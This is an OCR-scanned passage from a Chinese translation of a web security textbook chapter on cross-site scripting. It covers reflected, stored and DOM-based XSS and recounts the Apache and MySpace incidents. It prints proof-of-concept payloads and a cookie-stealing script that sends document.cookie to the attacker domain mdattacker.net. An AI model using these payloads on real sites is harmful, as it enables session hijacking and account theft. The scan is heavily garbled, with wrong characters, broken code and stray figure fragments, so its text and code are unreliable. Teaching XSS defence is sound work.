所 使 用 的 基本 攻击 方法 是 以 无 法 预料 的 方式 与 服务 天 进行 交互 的 , 目的 是 执行 未 授权 操作 并 非法 
访问 数据 。 

本 草 撒 述 的 攻击 属于 另外 一 种 类 型 , 因为 攻击 者 的 主要 对 象 是 应 用 程序 的 其 他 用 户 。 服 务 夫 
端 应 用 程序 仍然 存在 所 有 相关 漏洞 ; 然而 , 攻击 者 利用 应 用 程序 的 一 些 行为 执行 针对 其 他 终端 用 
户 的 恶意 操作 。 这 些 操作 可 能 会 造成 一 些 与 前 面 分析 过 的 攻击 相同 的 后 采 ， 如 会 话 支持 、 未 授权 
操作 和 披露 个 人 信息 ; 还 可 能 导致 其 他 恶果 ， 如 记录 键 击 或 在 用 户 的 计算 机 上 执行 任意 命令 。 

近年 来 ， 软件 安全 其 他 领域 的 关注 焦点 已 逐渐 由 服务 锋 病 攻击 转变 为 客户 问 攻 击 。 举 例 来 说 ， 
Microsoft 过 去 会 定期 宣布 其 服务 磊 产 品 中 存在 的 严重 安全 汤 洞 。 虽 人 然 他 们 也 披露 大 量 客户 并 缺 
陷 , 但 这 类 缺陷 很 少 受 到 关注 ; 因为 对 攻击 者 而 言 ， 服务器 是 一 个 更 具 吸 引力 的 目标 。 仪 仅 几 年 
内 , 这 种 情况 就 发 生 显 闭 改 变 。 上 自 Microsoft 的 IIS 6 Web 服 务 郁 首次 发 布 以 来 ,人 们 已 经 在 Microsoft 
Internet Explorer 浏览 硕 中 发 现 了 大 量 漏洞 。 随 看 人 们 对 安全 威胁 意识 的 普 遇 增强 ,软件 开发 者 与 
黑客 之 间 的 前 治 战 场 已 经 由 服务 套 转 回 客 户 端 。 

虽然 Web 应 用 程序 安全 状况 尚未 发 生 上 述 巨大 的 转变 ,但 也 出 现 了 相同 的 趋势 。20 世 纪 90 年 
代 未 , 因特网 上 的 大 多 数 应 用 程序 中 充斥 着 命令 注入 之 类 的 严重 缺陷 , 任何 攻击 者 只 要 具备 一 点 
点 相关 知识 ， 就 能 够 轻易 发 现 并 利用 这 些 弱 点 。 尽 管 许 多 这 种 类 型 的 漏洞 今天 依然 存在 ,但 数量 
逐 潮 减 小 并 且 变 得 更 加 难以 利用 。 然 而 ， 即 使 是 最 为 注重 安全 的 应 用 程序 , 也 仍然 包含 许多 可 轻 
易 发 现 的 客户 问 缺 聊 。 此 外 ， 应 用 程序 的 服务 需 端 以 有 限 、 可 探 的 方式 运行 ， 而 客户 端 可 使 用 任 
意 数 量 的 各 种 浏览 妖 技 术 ( 包括 各 种 版 本 )， 巾 此 客户 端面 临 大 范围 可 成 功 实施 的 攻击 回 量 。 

许多 年 前 ， 各 种 服务 硕 端 漏洞 大 行 其 道 ; 如 今 ， 随 着 人 们 前 次 谈 及 会 话 固定 之 类 的 汤 洞 ， 客 
户 端 漏 洞开 始 成 为 最 近 人 研究 的 主要 焦点 。 客 户 端 攻击 成 为 以 Web 安 全 为 报导 对 象 的 新 闻 媒 体 的 主 
要 关注 焦点 ， 间 谍 软 件 、 钓 鱼 攻击 和 木马 等 名 词 成 为 许多 以 前 从 未 听 说 过 SQL 注入 或 路 径 遍 历 的 
新 闻 记 者 的 口头 禅 。 针 对 Web 应 用 程序 用 户 的 攻击 也 日 益 成 为 有 利 可 图 的 犯罪 行为 。 如 果 一 家 因 
特 网 银行 拥有 1000 万 个 用 户 , 并 且 不 需要 熟练 的 技能 ,只 需要 通过 相对 简单 的 攻击 方法 就 可 以 攻 
破 其 中 1% 的 用 户 ， 那 何必 还 要 费 神 去 入 侵 这 家 银行 呢 ? 

针对 其 他 应 用 程序 用 户 的 攻击 形式 各 寞 ， 它 们 之 间 的 微妙 之 处 与 细微 差别 常 第 被 人 们 忽略 。 
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通常 , 与 主要 的 服务 带 端 攻击 相 比 ， 人 们 对 这 些 攻击 也 知之 其 少 ， 即 使 经 验 丰 宦 的 渗透 测试 员 也 
会 混 酒 或 忽略 各 种 不 同 的 源 洞 。 本 革 将 摘 述 各 种 第 见 的 源 洞 ， 并 说 明 渗 透 测试 员 在 确认 并 利用 这 
些 源 洞 时 所 第 采取 的 实用 步 又 。 

本 半 主 要 介绍 跨 站 点 脚本 (XSS )。 这 类 澳 洞 导致 了 针对 其 他 用 户 的 重量 级 攻击 。 从 采种 程 
度 上 说 ，XSS 是 在 Web 应 用 程序 中 发 现 的 最 为 普 志 的 着 洞 ， 困 扰 看 现在 绝 大 多 数 的 应 用 程序 ， 包 
括 因特网 上 一 些 最 为 注重 安全 的 应 用 程序 ， 如 电子 银行 使 用 的 应 用 程序 。 在 下 一 半 中 ,我 们 将 介 
绍 各 种 针对 用 户 的 其 他 类 型 的 攻击 ， 其 中 的 一 些 攻击 与 XSS 非 第 类 似 。 




















© 错误 观点 “用 户 之 所 以 被 攻破 ， 是 因为 他 们 没有 安全 意识 。” 
从 菜 种 程度 上 说 ， 这 种 观点 是 正确 的 ， 但 是 ， 尽 管用 户 采 取 了 安全 防御 ， 一 些 针 


对 应 用 程序 用 户 的 攻击 仍然 能 够 取得 成 功 。 保 存 型 XSS 攻 击 能 够 攻破 最 具 安 全 意识 的 


用 户 ， 而 无 须 与 用 户 进 行 任 何 交 互 。 在 第 13 章 ， 我 们 将 介绍 许多 其 他 方法 ， 可 在 用 户 
不 知情 的 情况 下 攻破 具有 安全 意识 的 用 户 。 





最 初 , 当 XSS 在 Web 应 用 程序 安全 社区 广 为 人 们 所 知 时 , 一 些 专 业 渗透 测试 人 员 倾 问 于 将 XSS 
当做 一 种 “次 要 ” 源 洞 。 这 一 部 分 是 因为 该 源 洞 在 Web 应 用 程序 中 极为 第 见 ， 也 因为 与 服务 带 端 
命令 注入 等 许多 汤 洞 相 比 ，XSS 并 不 能 被 独立 黑客 下 接 用 于 攻击 应 用 程序 。 随 着 时 间 的 推移 ， 这 
种 观点 已 发 生 改 变 ， 如 今 ，XSS 已 被 人 们 视 为 Web 应 用 程序 面临 的 最 主要 的 安全 威胁 。 随 着 对 客 
户 问 攻击 的 人 研究 不 断 深入 ， 人 们 开始 讨论 各 种 其 他 复杂 性 与 利用 XSS 源 洞 的 攻击 不 相 上 下 的 攻 
击 。 与 此 同时 ,现实 世界 中 也 出 现 了 大 量 利 用 XSS 源 洞 攻 破 知 名 机 构 的 攻击 。 

通常 情况 下 ，XSS 是 一 类 主要 的 应 用 程序 安全 缺陷 , 它 第 津 与 其 他 淘 洞 一 起 造成 破坏 性 的 后 
末 。 有 时 ，XSS 攻 击 也 可 能 转变 成 茶 种 病毒 或 能 够 目 我 党 殖 的 肾 虫 ， 这 种 攻击 确实 非常 严重 。 





























错误 观点 “不 可 能 通过 XSS 控 制 一 个 Web 应 用 程序 。” 


我 们 曾 仅 使 用 义 SS 攻 击 控 制 大 量 的 应 用 程序 。 在 适当 的 情况 下 ,技术 熟练 的 攻击 
者 利用 XSS 漏 洞 即 可 完全 攻破 一 个 应 用 程序 。 下 面 将 说 明 攻 击 者 如 何 实施 攻击。 





12.1 XSS 的 分 类 


XSS 源 洞 表 现 为 各 种 形式 ， 并 且 可 分 为 3 种 类 型 : 反射 型 、 保 存 型 和 基于 DOM 的 XSS 漏 洞 。 
虽然 这 些 漏 洞 具 有 一 些 相 同 的 特点 , 但 在 如 何 确定 及 利用 这 些 漏洞 方面 , 仍然 存在 一 些 重要 的 差 
异 。 下 面 我 们 将 分 别 介 绍 每 一 类 XSS 源 洞 。 


12.1.1 反射 型 XSS 漏 洞 


如 有 果 一 个 应 用 程序 使 用 动态 页 面 问 用 户 显 示 错 误 消 息 , 束 会 造成 一 种 津 见 的 XSS 汤 洞 。 通 第 ， 
该 页 面 会 使 用 一 个 包含 消息 文本 的 参数 ， 并 在 啊 应 中 将 这 个 文本 返回 给 用 户 。 对 于 开发 者 而 言 ， 
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使 用 这 种 机 制 非常 方便 , 因为 它 允 许 他 们 从 应 用 程序 中 调用 一 个 定制 的 错误 页 面 ， 而 不 需要 对 错 
误 页 面 中 的 消息 分 别 进 行 便 编码 。 
例如 ， 下 面 的 URL 返 回 如 图 12-1 所 示 的 错误 消息 : 


http://mdsec.net/error/S/Error.ashx?rmessage=Sorry%®%2c+anterror+occurred 





- Windows Internet Explorer 


GE 到 | 乱 | http;/imdsec.netie r,ashx?message=Sorry%2c+ant+errort+occul 


File Edt Yew Favorites Tools Help 
二 Favorites 已 Eror 从 MM | en ~ Pagev 5afety ~ Tools ~ [7 








Sorry, an error occurred 





pe TT Vr 网 "JR 
图 12-1 一 条 动态 生成 的 错误 消息 


分 析 返 回 页 面 的 HTML 源 代码 后 ,我 们 发 现 ， 应 用 程序 只 是 简单 复制 URL 中 message 参 数 的 
值 ， 并 将 这 个 值 插入 到 位 于 适当 位 置 的 错误 页 面 模板 中 : 

D>0rry, a error Occurred, </p> 

提取 用 户 提交 的 输入 并 将 其 插入 到 服务 需 啊 应 的 HTML 代码 中 ， 这 是 XSS 漏 洞 的 一 个 明显 特 
征 ; 如 果 应 用 程序 没有 实施 任何 过 滤 或 净化 措施 , 那么 它 很 容易 受到 攻击 。 让 我 们 来 看 看 如 何 实 
施 攻击 。 

下 面 的 URL 经 过 专门 设计 ， 它 用 一 段 生 成 弹出 对 话 框 的 JavaScript 代 码 代 替 错 误 消 息 : 

http://mdsec.net/error/5/Error.ashx?message=<script>alert (1) </script> 
请 求 这 个 URL 将 会 生成 一 个 HTML 页面 ， 其 中 包含 以 下 蔡 代 原始 消息 的 脚本 : 


0 


可 以 肯定 ， 如 果 该 页 面 在 用 户 的 浏览 硕 中 显示 ， 弹 出 消息 就 会 出 现 ， 如 图 12-2 所 示 。 


Error- Windows Internet Explorer 一 = -Io| x| 
Bing ID - 
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Ne 
图 12-2 一 次 概念 验证 XSS 攻 击 
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进行 这 个 简单 的 测试 有 助 于 澄清 两 个 重要 问题 : 首先 , message 人 参数 的 内 容 可 用 任何 返回 给 
浏览 规 的 数据 和 奉 代 ; 其 次 ， 无 论 服 务 需 端 应 用 程序 如 何 处 理 这 些 数 据 ( 如 果 有 )， 都 无 法 阻止 提 
交 JavaScript 人 代码， 一旦 错误 页 面 在 浏览 如 中 显示 ， 这 些 代 码 就 会 执行 。 


尝试 访问 


http://mdsec.netyerror3/ 





注解 ”如 果 在 Internet Explorer 中 尝试 这 样 的 示例 ， 弹 出 窗口 可 能 无 法 显示 ， 浏 

能 会 显示 以 下 消息 :“ 为 帮助 阻止 跨 站 点 脚本 ，Internet Explorer 已 修改 此 页 面 。 这 是 
为 最 新 版 本 的 Internet Explorer 包 含 一 个 旨 在 帮助 用 户 防 范 反 射 型 XSS 漏 洞 的 内 置 机 
制 。 如 果 要 测试 这 些 示例 ， 可 以 尝试 使 用 其 他 未 使 用 这 种 保护 机 制 的 浏览 器， 或 者 通 


过 以 下 方式 禁用 XSS 筛 选 器 :“ 工 具 ” 一 “Internet 选 项 ”一 “安全 ”一 “ 自 定 义 级 别 ”， 
在 “启用 XSS 笋 选 器 ”下 选择 “禁用 ”。 我 们 将 在 本 章 后 面部 分 讨论 XSS 筛 选 器 的 工作 
机 制 ， 以 及 避 开 这 种 入 选 器 的 方法 。 











在 现实 世界 的 Web 应 用 程序 中 存在 的 XSS 漏 洞 , 有 近 75% 的 漏洞 属于 这 种 简单 的 XSS bug。 由 
于 利用 这 种 漏洞 需要 设计 一 个 包含 艇 人 式 ] avaScript 代 码 的 请 求 ,随后 这 些 代 码 又 被 反射 到 任何 提 
出 请 求 的 用 户 ， 因 而 它 被 称 作 反 射 型 XSS。 攻 击 有 效 载 何 分 别 通 过 一 个 单独 的 请 求 与 啊 应 进行 传 
送 和 执行 。 为 此 ， 有 了 时 它 也 被 称 为 一 阶 XSS。 

利用 漏洞 

下 文 将 会 介绍 ， 利 用 XSS 漏 洞 攻击 应 用 程序 其 他 用 户 的 方式 有 很 多 种 。 最 简单 的 一 种 攻击 ， 
也 是 我 们 常用 于 说 明 XSS 源 洞 潜 在 影响 的 一 种 攻击 , 可 导致 攻击 者 截获 通过 验证 的 用 户 的 会 话 令 
牌 。 支 持 用 户 的 会 话 后 ， 攻 击 者 就 可 以 访问 该 用 户 经 授权 访问 的 所 有 数据 和 功能 ( 参见 第 7 董 )。 

实施 这 种 攻击 的 步 又 如 图 12-3 所 示 。 

(1) 用 户 正 党 登录 应 用 程序 ， 得 到 一 个 包含 会 话 令 牌 的 cookie: 

Set-Cookie: SessTIQ=184a9138ea37374201a4cCc96723682f12459C2aa6524913 

(2) 攻击 者 通过 某 种 方法 〈 话 情 见 下 文 ) 向 用 户 提 区 以 下 URL: 


http://mdsec.net/error/S/Error.ashx?message=<script>var+i=new+Image 









































;+i.sSrc="http://mdattacker.net/"%2bdocument .cookie;</script> 

和 前 面 生 成 一 个 对 话 框 消息 的 示例 一 样 ， 这 个 URL 包 含 租 入 式 JavaScript 代码 。 但 是 ， 这 个 
示例 中 的 攻击 有 效 载 傈 更 加 恶毒 。 

(3) 用 户 从 应 用 程序 中 请 求 攻击 者 传送 给 他 们 的 URL。 

(4) 服务 器 啊 应 用 户 的 请 求 。 由 于 应 用 程序 中 存在 XSS 漏 洞 ， 啊 应 中 包含 攻击 者 创建 的 
JavaScript 代 人 码 。 

(5) 用 户 浏览 硕 收 到 攻击 者 的 JavaScript 代 码 ， 像 执行 从 应 用 程序 收 到 的 其 他 代码 一 样 ， 浏 览 
融 执行 这 段 代 码 。 
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5. 攻击 者 的 JavaScript CR : | 
在 用 户 的 浏览 器 中 执行 ”<。 2 攻击 者 将 他 自己 准备 的 URL 提交 给 客户 入 


他 6. 用 户 的 浏 览 辟 向 攻击 者 发 送 会 话 令 牌 














图 12-3 ”反射 型 XSS 攻 击 的 实施 步骤 


(6) 攻击 者 创建 的 恶意 JavaScript 代 码 为 : 

var i=new Image; i.src="http://mdattacker.net/"+document .cookie; 

这 段 代码 可 让 用 户 浏览 带 问 mdattacker.net( 攻击 者 拥有 的 一 个 域 ) 提出 一 个 请 求 。 请 求 中 包 
含 用 户 访问 应 用 程序 的 当前 会 话 令 牌 : 


GET /sessId=184a9138ed37374201a4c9672362f12459c2a652491a3 HTTP/1.1 
Host: mdattacker.net 


(7) 攻击 者 监控 访问 mdattackernet 的 请 求 并 收 到 用 户 的 请 求 。 攻击 者 使 用 截获 的 令 牌 劫持 用 户 
的 会 话 ， 从 而 访问 该 用 户 的 个 人 信息 ， 并 “代表 ”该 用 户 执行 任意 操作 。 











= 
\ 屋 


\, 


7 A\ 
到 
< 





注解 ”第 6 齐 已 经 介绍 过 ， 一 些 应 用 程序 保存 一 个 持久 性 cooKkie， 以 在 用 户 每 次 访问 
时 重新 对 其 进行 有 效 验 证 ， 例 如， 执行 “ 记 住 我 ”功能 。 这 时 ， 就 没有 必要 执行 上 


pe 


述 过 程 中 的 第 一 个 步骤 。 即 使 目标 用 户 并 未 处 于 活动 状态 或 登录 应 用 程序 ， 攻 击 者 
仍然 能 够 成 功 实现 目标 。 为 此 ， 以 这 种 方式 使 用 cookie 的 应 用 程序 更 易 受 到 XSS 漏 洞 
的 影响 。 





完成 上 述 步骤 后 ,读者 可 能 会 心 存疑 惑 : 如 果 攻 击 者 能 够 诱 使 用 户 访 问 他 选择 的 URL， 那么 
他 为 什么 还 要 费 这 么 大 力气 通过 应 用 程序 中 的 XSS 漏 洞 传送 自己 的 恶意 JavaScript 代 码 呢 ”为 什 
么 他 不 在 mdattackernet 上 保存 一 段 恶 意 脚 本 ， 并 回 用 户 传送 一 个 直接 指 回 这 段 脚 本 的 链接 呢 ? 这 
段 脚 本 不 是 可 以 和 上 例 中 的 脚本 一 样 执行 吗 ? 
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要 了 人 解 攻击 者 为 什么 需要 利用 XSS 源 洞 ， 需要 回顾 第 3 半 介 绍 的 同 源 案 略 。 为 防止 不 同 域 在 
用 户 浏览 姨 中 彼此 干扰 ， 浏览 右 对 从 不 同 来 源 〈 域 ) 收 到 的 内 容 进 行 隔 离 。 攻 击 者 的 目的 不 是 单 
纯 地 执行 任意 脚本 ， 而 是 帘 获 用 户 的 会 话 令 牌 。 浏 览 硕 不 允许 任何 旧 有 脚本 访问 一 个 站 点 的 
cookie， 和 否则 ， 会 话 就 很 容易 被 劫持 。 而 且 ， 只 有 发 布 cookie 的 站 点 能 人 够 访问 这 些 cookie: 仅 在 返 
回 发 布 站 点 的 HITP 请 求 中 提交 cookie; 只 有 通过 该 站 点 返回 的 页 面 所 包含 或 加 载 的 JavaScript 才 - 
能 访 问 coOokle。 此 如 果 mdattackernet 上 的 一 段 脚 本 查 询 document .cookie, 它 将 无 法 获得 
mdsec.net 发 布 的 cookie， 劫 持 攻击 也 不 会 成 功 。 

就 用 户 的 浏览 絮 而 言 , 利用 XSS 漏 洞 的 攻击 之 所 以 取得 成 功 , 是 因为 攻击 者 的 恶意 JavaScript 
是 由 mdsec.net 送 交 给 它 的 。 当 用 户 请 求 攻击 者 的 URL 时 , 浏览 右 问 http://mdsec.net/error/S/Error.ashx 
提交 一 个 请 求 ， 然 后 应 用 程序 返回 一 个 包含 一 段 JavaScript 的 页 面 。 和 从 mdsec.net 收 到 的 任何 
JavaScript 一 样 ， 浏 览 妖 执行 这 段 脚 本 ， 因 为 用 户 信 任 mdsec.net。 这 也 就 是 为 何 攻 击 的 脚本 能 够 访 
问 mdsec.net 发 布 的 cookie 的 原因 ， 虽 然 它 实 际 来 目 其 他 地 方 。 这 也 是 为 何 该 漏洞 被 称 作 跨 站 点 脚 
本 的 原因 。 




















12.1.2 ”保存 型 XSS 漏 洞 


另 一 种 帝 见 的 XSS 漏 洞 叫做 保存 型 跨 站 点 脚本 。 如 采 一 名 用 户 提交 的 数据 被 保存 在 应 用 程序 
中 (通常 保存 在 一 个 后 病 数 据 库 中 )， 然 后 不 经 适当 过 滤 或 净化 就 显示 给 其 他 用 户 ， 此 时 束 会 出 
现 这 种 漏 润 。 

在 文 持 终端 用 户 交 互 的 应 用 程序 中 , 或 者 在 具有 管理 权限 的 员工 访问 同一 个 应 用 程序 中 的 用 
户 记 录 和 数据 的 应 用 程序 中 ,保存 型 XSS 汤 洞 很 常见 。 例 如 ， 以 一 个 拍卖 应 用 程序 为 例 ， 它 允许 
买 家 提出 与 某 件 隘 品 有 关 的 问题 ， 然 后 由 中 家 回答 。 如 采 一 名 用 户 能 够 提出 一 个 包含 朋 入 式 
JavaScript 的 问题 ， 而 且 应 用 程序 并 不 过 滤 或 净化 这 个 JavaScript， 那 么 攻击 者 就 可 以 提出 一 个 专 
门 设计 的 问题 ， 在 任何 查看 该 问题 的 用 户 ( 包括 卖家 和 潜在 的 买 家 ) 的 浏览 硕 中 执行 任意 脚本 。 
在 这 种 情况 下 , 攻击 者 就 可 证 不 知情 的 用 户 去 竞标 一 件 他 不 想 要 的 商品 ; 或 者 让 一 位 卖家 接受 他 
提出 的 低 价 ， 结 束 苋 标 。 

一 般 情 况 下 ,， 利 用 保存 型 XSS 漏 洞 的 攻击 至 少 需要 回应 用 程序 提出 两 个 请 求 。 攻 击 者 在 第 一 
个 请 求 中 传送 一 些 专门 设计 的 数据 ， 其 中 包含 恶意 代码 ,应 用 程序 接受 并 保存 这 些 数据 。 在 第 二 
个 请 求 中 ,一 多 受害 者 查看 某 个 包含 攻击 者 的 数据 的 页 面 ， 这 时 恶意 代码 开始 执行 。 为 此 ， 这 种 
漏洞 有 时 也 叫做 三 阶 跨 站 点 脚本 。( 在 这 个 示例 中 ， 使 用 XSS 实 际 上 并 不 准确 ， 因 为 攻击 中 没有 
跨 站 点 元 素 。 但 由 于 这 个 名 称 被 人 们 广泛 使 用 ， 因 此 我 们 在 这 里 仍然 沿用 它 。) 

图 12-4 说 明了 一 名 攻击 者 如 何 利 用 保存 型 XSS 漏 洞 ， 实 施 上 述 利用 反射 型 XSS 漏 洞 实施 的 相 
同 会 话 劫持 攻击 。 
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5. 了 的 JavaScript 四 ee 
者 必 这 会 话 人 址 。 、 














图 12-4 保存 型 XSS 漏 洞 的 实施 步骤 


尝试 访问 
本 示例 包含 一 项 搜索 功能 , 可 用 于 显示 当前 用 户 输 入 的 查询 , 以 及 其 他 用 户 最 近 输 入 的 查 











询 列 表 。 由 于 奋 询 将 按 原 样 显示 ， 应 用 程序 将 易于 受到 反射 型 和 保存 型 XSS 攻 击 。 看 看 是 否 能 
人 够 找到 这 两 种 漏洞 。 
http://mdsec.net/search/11/ 











反射 型 与 保存 型 XSS 攻 击 在 实施 步骤 上 存在 两 个 重要 的 区 别 , 这 也 使 得 后 者 往往 造成 更 大 的 
安全 威胁 。 

首先 ， 在 反射 型 XSS 脚 本 攻击 中 ， 要 利用 一 个 漏洞 ， 攻 击 者 必须 以 某 种 方式 族 使 受害 者 访问 
他 专门 设计 的 URL。 而 保存 型 XSS 脚 本 攻击 则 没有 这 种 要 求 。 在 应 用 程序 中 展开 攻击 后 ， 攻 击 者 
只 需要 等 竺 受害 者 浏览 已 被 攻破 的 页 面 或 功能 。 通 常 ,这 个 页 面 是 一 个 正常 用 户 将 会 主动 访问 的 
常规 页 面 。 

其 次 ， 如 果 受 害 者 在 遭受 攻击 时 正在 使 用 应 用 程序 ,攻击 者 就 更 容易 实现 其 利用 XSS 漏 洞 的 
目的 。 例 如 ， 如 果 用 户 当 前 正在 进行 会 话 ， 那 么 攻击 者 就 可 以 劫持 这 个 会 话 。 在 反射 型 XSS 攻 击 
中 ,攻击 者 可 能 会 说 服用 户 登 录 ， 然 后 单 击 他 们 提供 的 一 个 链接 ， 从 而 制造 这 种 情况 。 或 者 他 可 
能 会 部 署 一 个 永久 性 的 有 将 载 荷 并 等 竺 用 户 登 录 。 但 是 , 在 保存 型 XSS 攻 击 中 , 攻击 者 能 够 保证 ， 
受害 用 户 在 他 实施 攻击 时 已 经 在 访问 应 用 程序 。 因为 攻击 有 效 载 向 被 保存 在 用 户 自主 访问 的 一 个 
应 用 程序 页 面 中 ,所 以 ， 当 有 效 载 傈 执行 时 ,任何 攻击 受害 者 都 在 使 用 应 用 程序 。 而 且 ， 如 果 上 
述 页 面 位 于 应 用 程序 通过 验证 的 区 域内 ， 那 么 那 时 攻击 受害 者 一 定 已 经 登录 。 

反射 型 与 保存 型 XSS 攻 击 之 间 的 这 些 区 别 意味 着 保存 型 XSS 源 洞 往往 会 给 应 用 程序 市 来 更 严 
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重 的 安全 威胁 。 许 多 时 候 , 攻击 者 可 以 癌 应 用 程序 提交 一 些 专门 设计 的 数据 ， 然 后 等 待 受害 者 访 
问 它 们 。 如 果 其 中 一 名 受害 者 是 管理 员 ， 那么 攻击 者 就 能 够 完全 攻破 整个 应 用 程序 。 


























12.1.3 ”基于 DOM 的 XSS 漏 站 


反射 型 和 保存 型 XSS 沁 洞 都 表现 出 一 种 特殊 的 行为 模式 ， 其 中 应 用 程序 提取 用 户 控 制 的 数据 
并 以 危险 的 方式 将 这 些 数据 返回 给 用 户 。 第 三 类 XSS 漏 洞 并 不 具有 这 种 特点 。 在 这 种 漏洞 中 ， 攻 
击 者 的 JavaScript 通 过 以 下 过 程 得 以 执行 。 

口 用 户 请 求 一 个 经 过 专门 设计 的 URL， 它 由 攻击 者 提交 ， 有 日 其 中 包含 腊 和 人 式 JavaScript。 

口 服务 需 的 啊 应 中 并 不 以 任何 形式 包含 攻击 者 的 脚本 。 

口 当 用 户 的 浏览 硕 处 理 这 个 啊 应 时 ， 上 述 脚 本 得 以 处 理 。 

这 一 系列 事件 如 何 发 生 呢 ? 由 于 客户 端 JavaScript 可 以 访问 浏览 需 的 文本 对 和 象 模型 
(Document Object Model，DOM )， 因 此 它 能 够 决定 用 于 加 载 当 前 页 面 的 URL。 由 应 用 程序 发 布 
的 一 段 脚 本 可 以 从 URL 中 提取 数据 ， 对 这 些 数 据 进行 处 理 , 然后 用 它 动 态 更 新 页 面 的 内 容 。 如 果 
这 样 ， 应 用 程序 就 可 能 多 于 受到 基于 DOM 的 XSS 攻 击 。 

回 到 前 面 的 反射 型 XSS 调 洞 中 的 示例 ,其 中 服务 天 闪 应 用 程序 将 一 个 URL 参 数 信 复制 到 一 条 
错误 消息 中 。 另 一 种 实现 相同 功能 的 办 法 是 由 应 用 程序 每 次 返回 相同 的 静态 HTML, 并 使 用 客户 
端 JavaScript 动 态 生 成 消息 内 容 。 

例如 ， 假 设 应 用 程序 返回 的 错误 页 面包 含 以 下 脚本 : 


<ScCript> 















































Var url = document.location:; 

url = unescape (url):; 

var message = url.substring(url.indexOf ('message=') + 8, url 
.length}.; 

document .write (message}): 


< 

这 段 脚本 解析 URL， 提 取出 message 人 参数 的 值 , 并 把 这 个 值 写 人 页 面 的 HTML 源 代码 中 。 如 
果 按 开发 者 预想 的 方式 调用 , 它 可 以 和 前 面 的 示例 中 一 样 ， 用 于 创建 错误 消息 。 但 是 ， 如 果 攻 击 
者 设计 出 一 个 URL， 并 以 JavaScript 代 人 码 作为 mnessage 参 数 ， 那么 这 上 段 代 人 码 将 被 动态 写 和 页面 中 ， 
并 像 服务 器 返回 代码 一 样 得 以 执行 。 在 这 个 示例 中 ， 前 面 示例 中 利用 反射 型 XSS 漏 洞 的 同一 个 
URL 也 可 用 于 生成 一 个 对 话 框 : 


http://mdsec.net/error/18/Error.ashx?message=<script>alert('xss')</script> 











尝试 访问 


http://mdsec.net/error/18/ 


利用 基于 DOM 的 XSS 漏 洞 的 过 程 如 图 12-5 所 示 。 
与 保存 型 XSS 漏 洞 相 比 ， 基 于 DOM 的 XSS 漏 洞 与 反射 型 XSS 漏 洞 有 更 大 的 相似 性 。 利 用 它们 
通常 需要 攻击 者 诱 使 一 名 用 户 访 问 一 个 包含 恶意 代码 的 专门 设计 的 URL, 并 由 服务 需 啊 应 那个 确 
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保 得 恶意 代码 得 以 执行 的 特殊 请 求 。 但 是 , 在 利用 反射 型 与 基于 DOM 的 XSS 漏 洞 的 细节 方面 , 还 
存在 一 些 重要 的 差异 ， 这 点 我 们 在 稍 后 讨论 。 























TURLhjagui 人 ”< 次 击 者 将 他 自己 准备 的 URL 回 僻 给 用 户 二 
avanwcllp 
TS 
攻击 者 


图 12-5 ”基于 DOM 的 XSS 攻 击 的 实施 步 又 


12.2 ”进行 中 的 XSS 攻击 


要 了 解 XSS 源 洞 导致 的 严重 后 宁 ， 有 必要 分 析 一 些 真 实 的 XSS 攻 击 示 例 ， 这 有 助 于 我 们 了 解 
XSS 攻 击 能 够 执行 的 各 种 恶意 操作 ， 以 及 如 何 针 对 受害 者 实施 这 类 攻击 。 





12.2.1 真实 XSS 攻 击 


2010 年 ，Apache Foundation 被 攻击 者 利用 其 问题 追踪 应 用 程序 中 的 漏洞 、 通 过 反射 型 XSS 攻 
击 攻破 。 首 移 ， 攻 击 者 发 布 一 个 使 用 重 定向 服务 进行 模糊 处 理 的 链接 ， 该 链接 指 回 一 个 利用 上 述 
XSS 汤 洞 获取 登录 用 户 的 会 话 令 牌 的 URL。 如 末 管 理 员 单 击 该 链接 ， 他 的 会 话 将 被 攻破 ,攻击 者 
将 获得 对 应 用 程序 的 管理 访问 权限 。 然 后 ,攻击 者 修改 某 个 项 目的 设置 ,将 该 项 目的 上 传 文件 夹 
更 改 为 应 用 程序 的 Web 根 目录 中 的 可 执行 目录 。 随 后 , 攻击 者 丫 此 文件 夹 上 传 一 个 木马 登录 表单 ， 
从 而 获取 特权 用 户 的 用 户 名 和 密码 。 通 过 这 种 方法 , 攻击 者 确定 一 些 在 基础 架构 的 其 他 系统 中 重 
复 使 用 的 密码 ， 并 完全 攻破 这 些 系统 ， 将 攻击 范围 扩展 到 易 受 攻击 的 Web 应 用 程序 之 外 。 

有 关 此 次 攻击 的 详情 ， 请 参阅 以 下 URL: 

http://blogs.apache.org/infra/entry/apache org 04 09 201C 

2005 年 ,发现 社交 网 络 站 点 MySpace 易于 受到 保存 型 XSS 攻 击 。 里 然 MySpace 的 应 用 程序 实 
施 了 过 滤 ， 防 止 用 户 在 他 们 的 用 户 资 料 页 面 瞬 入 JavaScript 脚 本 ， 但是， 一 位 名 叫 Samy 的 用 户 找 
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到 了 一 种 避 开 这 些 过 滤 的 方法 , 并 在 用 户 资料 页 面 中 插入 了 一 些 JavaScript 脚 本 。 如 末 一 名 用 户 碍 
看 他 的 用 户 资 料 ， 这 段 脚 本 就 会 执行 ， 导致 受 害 者 的 浏览 各 执行 各 种 操作 。 这 束 造 成 了 两 个 严重 
后 果 : 首先， 它 把 Samy 加 为 受害 者 的 “朋友 ”; 其 次 ， 它 把 上 述 脚 本 复制 到 受害 者 目 己 的 用 户 资 
料 页 面 中 ,因此 ,任何 查看 受害 者 用 户 资料 的 用 户 也 会 成 为 这 次 攻击 的 受害 者 。 结 采 ， 一 个 基于 
XSS 的 蠕虫 在 因特网 上 迅速 扩散 ， 几 小 时 内 ，S$amy 收 到 了 近 100 万 个 朋友 邀请 。 为 此 ，MySpace 
被 迫 天 财 它 的 应 用 程序 ， 从 所 有 用 户 的 资料 中 删除 恶意 脚本 ， 并 修复 反 XSS 过 小 机 制 中 的 缺陷 。 

有 关 此 次 攻击 的 详细 信息 ， 请 参阅 以 下 URL: 

http://namb.la/popular/tech.html 

当 收 件 人 查阅 电子 邮件 时 ， 邮 件 内 容 在 麟 览 各 中 显示 ; Web 邮 件 应 用 程序 的 这 种 行为 本 里 就 
存在 看 保存 型 XSS 攻 击 风 险 。 电 子 邮 件 中 可 能 包含 HTML 格 式 的 内 容 ， 因 此 应 用 程序 会 立即 将 第 
三 方 HIML 复 制 到 回 用 户 显 示 的 页 面 中 。2009 年 ， 一 家 名 为 SttongWebmail 的 Web 邮 件 提 供 商 悬赏 
1 万 美元 ， 征 询 能 够 侵入 其 CEO 电 子 邮 件 的 黑客 。 最 终 ， 黑 客 在 该 Web 邮 件 应 用 程序 中 发 现 一 个 
